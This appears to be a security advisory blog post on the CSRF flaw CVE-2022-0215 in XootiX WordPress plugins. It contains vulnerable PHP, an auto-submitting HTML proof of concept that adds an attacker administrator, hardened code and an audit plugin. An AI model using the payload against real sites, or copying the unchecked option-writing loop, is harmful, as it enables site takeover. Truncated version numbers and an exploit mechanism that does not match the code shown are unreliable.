If you run a WordPress site with popular XootiX plugins—Login/Signup Popup, Waitlist Woocommerce (Back in Stock Notifier), or Side Cart Woocommerce (Ajax)—your site may be exposed to CVE-2022-0215, a dangerous Cross-Site Request Forgery (CSRF) vulnerability. This flaw makes it possible for an attacker to take full control of your site, including creating new administrator accounts.

Let’s break things down simply and see exactly how this happens.

What Is The Problem?

The XootiX plugins handle all sorts of useful shop functionality for your WooCommerce store. However, up until version 2.2 in Login/Signup Popup, version 2.5.1 in Waitlist Woocommerce, and version 2. in Side Cart Woocommerce, there’s a coding mistake in their admin settings code.

The plugins' /includes/xoo-framework/admin/class-xoo-admin-settings.php file has a function called save_settings. There’s supposed to be a security check to confirm that changes to plugin settings are coming from real site administrators using the dashboard. This security check is called a CSRF (Cross-Site Request Forgery) protection.

But in these versions, the CSRF protection is missing.

This means a *malicious actor* can trick an admin into visiting a link or page that silently sends a request to your site, changing plugin options *without their knowledge*. This could allow an attacker to change any option—including those that could let them create a new admin account!

1. An attacker prepares a web page (or link) that carries a hidden form aimed at your site.

2. The site admin, while logged in, visits this page.

3. The page silently sends a POST request to save_settings—with whatever values the attacker wants.

4. The site quietly accepts the settings change.

5. If "Add Admin User" is exposed, or a plugin setting controls user roles, the attacker could grant administrative access to their own account.

Below is a simplified version of the insecure code from class-xoo-admin-settings.php:

class Xoo_Admin_Settings {
    public function save_settings() {
        // A CSRF check belongs here, for example:
        //   check_admin_referer( 'xoo_settings_nonce' );
        // In the affected versions it is missing.

        // Every field of the POST body is written straight into wp_options,
        // so the request decides which option names get which values.
        foreach ( $_POST as $key => $value ) {
            update_option( $key, $value );
        }
    }
}


Without a check_admin_referer() call, the site accepts these settings from any request that carries a logged-in admin's session cookies, whichever page that request was sent from.
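For contrast, here is what a hardened version of the same handler looks like. This is an added example written for this post, not the XootiX plugin's actual patch: the class name, the nonce action 'xoo_settings_save', the option names in the allowlist and the admin-post hook are assumptions chosen for illustration, and the settings page slug xoo-settings is reused from the PoC URL above.

```php
<?php
// Added example (not XootiX's code): a hardened settings handler.
// Assumptions: the form is rendered by render_form(), the nonce action is
// 'xoo_settings_save', and $allowed_options lists the only option names this
// handler may write. All of these are illustrative placeholders.
class Xoo_Admin_Settings_Hardened {

    /** Only these options may be written by save_settings() (allowlist). */
    private $allowed_options = array(
        'example_plugin_popup_enabled',
        'example_plugin_popup_delay',
    );

    /** Route the form to a dedicated admin-post action for logged-in users. */
    public function __construct() {
        add_action( 'admin_post_xoo_settings_save', array( $this, 'save_settings' ) );
    }

    /** Render the form; wp_nonce_field() emits the hidden _wpnonce token. */
    public function render_form() {
        ?>
        <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
            <?php wp_nonce_field( 'xoo_settings_save' ); ?>
            <input type="hidden" name="action" value="xoo_settings_save">
            <label>Popup delay (seconds)
                <input type="text" name="example_plugin_popup_delay"
                       value="<?php echo esc_attr( get_option( 'example_plugin_popup_delay', '' ) ); ?>">
            </label>
            <?php submit_button(); ?>
        </form>
        <?php
    }

    public function save_settings() {
        // 1. Capability: only users allowed to manage options get this far.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
        }

        // 2. CSRF: the nonce is bound to this user, this action and a time
        //    window, so a form hosted on another site cannot supply it.
        //    check_admin_referer() stops the request if it is missing or stale.
        check_admin_referer( 'xoo_settings_save' );

        // 3. Allowlist: never loop over $_POST. Only known option keys are
        //    written, so even a valid request cannot touch unrelated options.
        foreach ( $this->allowed_options as $key ) {
            if ( ! isset( $_POST[ $key ] ) ) {
                continue;
            }
            $value = sanitize_text_field( wp_unslash( $_POST[ $key ] ) );
            update_option( $key, $value );
        }

        wp_safe_redirect( admin_url( 'admin.php?page=xoo-settings&updated=1' ) );
        exit;
    }
}

new Xoo_Admin_Settings_Hardened();
```

The three checks cover different failures: the capability check keeps low-privilege users out even if they obtain a valid nonce, the nonce check defeats the cross-site form described in this post, and the allowlist means a bug in either of the first two cannot be turned into "write any option you like".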

Proof-of-Concept (PoC) Exploit

*Disclaimer: This is for educational purposes only. Do not use it to attack others' sites!*

Suppose the plugin uses an option that lets it manage users (or exposes WP options in settings). An attacker could send this HTML to an admin:

<form id="attack" action="https://victim-site.com/wp-admin/admin.php?page=xoo-settings&action=save_settings" method="POST">
    <input type="hidden" name="new_user_login" value="xootixhacker">
    <input type="hidden" name="new_user_pass" value="H4ck3rP@sswrd!">
    <input type="hidden" name="new_user_email" value="attacker@example.com">
    <input type="hidden" name="new_user_role" value="administrator">
</form>
<script>
    document.getElementById('attack').submit();
</script>

When the admin (already logged in) visits this page, the form is submitted in the background. Because the request carries the admin's session cookies and nothing ties it to a form the site itself rendered, the site treats it as a legitimate settings change.

All sites running these plugins are affected:

- Login/Signup Popup <= 2.2
- Waitlist Woocommerce (Back in Stock Notifier) <= 2.5.1
- Side Cart Woocommerce (Ajax) <= 2.

A strong password or additional security plugins do not help here: the forged request rides on the admin's already-authenticated session, so it looks like any other settings change made from the dashboard.

What Should You Do?

1. Update Immediately!

Get the latest, patched versions of:

- Login/Signup Popup
- Waitlist Woocommerce
- Side Cart Woocommerce

2. Double-Check Administrators:  
After patching, review your admin user list for unknown accounts.

3. Scan For Option Changes:  
Check for weird configuration changes under the affected plugins or weird site behavior.
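To make steps 2 and 3 easier to act on, here is an added example of a small must-use plugin that logs option changes and administrator grants and lists the current administrators for review. It is not part of the XootiX plugins or of this advisory: the option prefix 'xoo_' is an assumption based on the plugin framework's name (adjust it to the option names your installation actually uses), and the function names and log line format are made up for this post.

```php
<?php
/**
 * Plugin Name: Example Admin/Option Audit Log
 * Description: Added example (not XootiX's or WordPress core code). Place it
 * in wp-content/mu-plugins/ to log option changes and administrator grants.
 */

// Option-name prefix to watch. 'xoo_' is an assumption; change it to match
// the options the affected plugins store on your site.
define( 'EXAMPLE_AUDIT_OPTION_PREFIX', 'xoo_' );

/** Write one line to the PHP error log (wp-content/debug.log when WP_DEBUG_LOG is on). */
function example_audit_log( $event, array $details ) {
    $user                 = wp_get_current_user();
    $details['actor']     = ( $user && $user->ID ) ? $user->user_login : 'anonymous';
    $details['remote_ip'] = isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : '';
    $details['referer']   = wp_get_referer() ? wp_get_referer() : '';
    error_log( sprintf( '[audit] %s %s', $event, wp_json_encode( $details ) ) );
}

/** Fires after any option is updated: record changes under the watched prefix. */
add_action( 'updated_option', function ( $option, $old_value, $value ) {
    if ( 0 !== strpos( $option, EXAMPLE_AUDIT_OPTION_PREFIX ) ) {
        return;
    }
    example_audit_log( 'option_updated', array(
        'option' => $option,
        'old'    => $old_value,
        'new'    => $value,
    ) );
}, 10, 3 );

/** Fires when a user's role changes: flag promotions to administrator. */
add_action( 'set_user_role', function ( $user_id, $role, $old_roles ) {
    if ( 'administrator' !== $role ) {
        return;
    }
    $user  = get_userdata( $user_id );
    $login = $user ? $user->user_login : '';
    example_audit_log( 'admin_role_granted', array(
        'user_id'   => $user_id,
        'login'     => $login,
        'old_roles' => $old_roles,
    ) );
    wp_mail(
        get_option( 'admin_email' ),
        'Administrator role granted',
        sprintf( 'User #%d (%s) was given the administrator role.', $user_id, $login )
    );
}, 10, 3 );

/** Fires after a new user is created: log it when the new user is an administrator. */
add_action( 'user_register', function ( $user_id ) {
    $user = get_userdata( $user_id );
    if ( $user && in_array( 'administrator', (array) $user->roles, true ) ) {
        example_audit_log( 'admin_user_created', array(
            'user_id' => $user_id,
            'login'   => $user->user_login,
            'email'   => $user->user_email,
        ) );
    }
}, 10, 1 );

/**
 * Return the current administrator accounts for the post-patch review
 * (step 2). From the shell: wp eval 'print_r( example_audit_list_admins() );'
 */
function example_audit_list_admins() {
    $admins = array();
    foreach ( get_users( array( 'role' => 'administrator' ) ) as $user ) {
        $admins[] = array(
            'ID'         => $user->ID,
            'login'      => $user->user_login,
            'email'      => $user->user_email,
            'registered' => $user->user_registered,
        );
    }
    return $admins;
}
```

The log lines record who the request was attributed to and what referer it carried, which is exactly the signal a CSRF leaves behind: a settings change attributed to a real administrator but arriving from an unexpected page. Ship the log to whatever you already monitor, and treat any admin_role_granted or admin_user_created entry you did not make yourself as an incident.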

References & Further Reading

- Original WPScan Advisory on CVE-2022-0215
- Login/Signup Popup Plugin on WordPress.org
- Patchstack Vulnerability Report
- CSRF Explained for Beginners

In Summary

CSRF bugs in WordPress plugins like XootiX's can be a one-click site takeover risk. Always update plugins quickly, monitor your admin user list, and stay subscribed to security feeds for the latest vulnerabilities.

Timeline

Published on: 01/18/2022 17:15:00 UTC
Last modified on: 01/24/2022 20:31:00 UTC